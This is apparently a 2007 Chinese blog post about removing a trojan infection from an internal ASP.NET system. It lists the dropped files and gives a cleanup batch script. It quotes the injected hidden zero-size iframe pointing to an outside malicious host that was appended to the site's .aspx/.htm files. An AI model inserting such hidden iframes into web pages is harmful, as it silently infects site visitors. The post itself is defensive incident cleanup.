梦醒三分,执着疯子
没有什么不可以!
            这几天电脑遭病毒木马袭击几近疯狂。Logo1.exe,Rundl32.exe,威金,灰鸽子,pp.600999.com等病毒或木马疯涌而至,导致系统崩溃,所以常常gHost。但是恢复之后没多久又挂了,我都快气炸了。本人对杀毒软件没什么好感,所以能自己搞定的就自己干掉它。
            几经周折之后,发现只要使用了我们的内部系统,然后就中招了。我们的内部系统是用asp.Net+sqlserver2000开发的。打开IE,登录我们的系统时发现IE的状态栏有http://pp.900666.com/abc.htm文字,而且登录我们内部系统的速度极慢,IE异常关闭。然后在windows目录下多出cmdbcs.exe,wsttrs.exe,msccrt.exe,winform.exe四个文件,在Documents and Settings/登录用户名/Local Settings/Temp目录下多出upxdnd.exe和upxdnd.dll两个文件,一般Local Settings目录是隐身的。 在我们内部系统的.aspx/.htm文件尾都有“<iframe src=http://pp.900666.com/abc.htm width=0 height=0></iframe>“这样一段代码。我通过IE访问http://pp.900666.com/abc.htm却提示IE错误。知道了这些我们就可以进行清除行动了。
            重启电脑,按F8以安全模式登录操作系统。到windows目录下将cmdbcs.exe,wsttrs.exe,msccrt.exe,winform.exe四个文件删除掉,到另一个目录下将upxdnd.exe和upxdnd.dll两个文件,如果upxdnd.dll文件删除不了,就要先将Explorer.exe进程关掉,再删除upxdnd.dll文件。然后通过cmd运行Msconfig.exe在启动项里将cmdbcs.exe,winform.exe,wsttrs.exe等项前面的钩去掉。最后将内部系统里.aspx/.htm文件里的”<iframe src=http://pp.900666.com/abc.htm width=0 heifht=0></iframe>“这一行去掉,再将.aspx/.htm文件的属性再设为只读方式,以防止再次被注入。当然我们也可以做一个abc.bat文件来删除这些病毒文件。
文件内容如下:
echo 杀死pp.900666.com木马病毒
del c:\windows\cmdbcs.exe
del c:\windows\wsttrs.exe
del c:\windows\msccrt.exe
del c:\windows\winform.exe
del C:\DOCUME~1\GUIGU2~1\LOCALS~1\Temp\upxdnd.exe
taskkill /IM explorer.exe /F
del C:\DOCUME~1\GUIGU2~1\LOCALS~1\Temp\upxdnd.dll
c:\windows\explorer.exe
echo 清理完毕!
posted on 2007-04-19 15:07  Jacker.W  阅读(951)  评论(0编辑  收藏  举报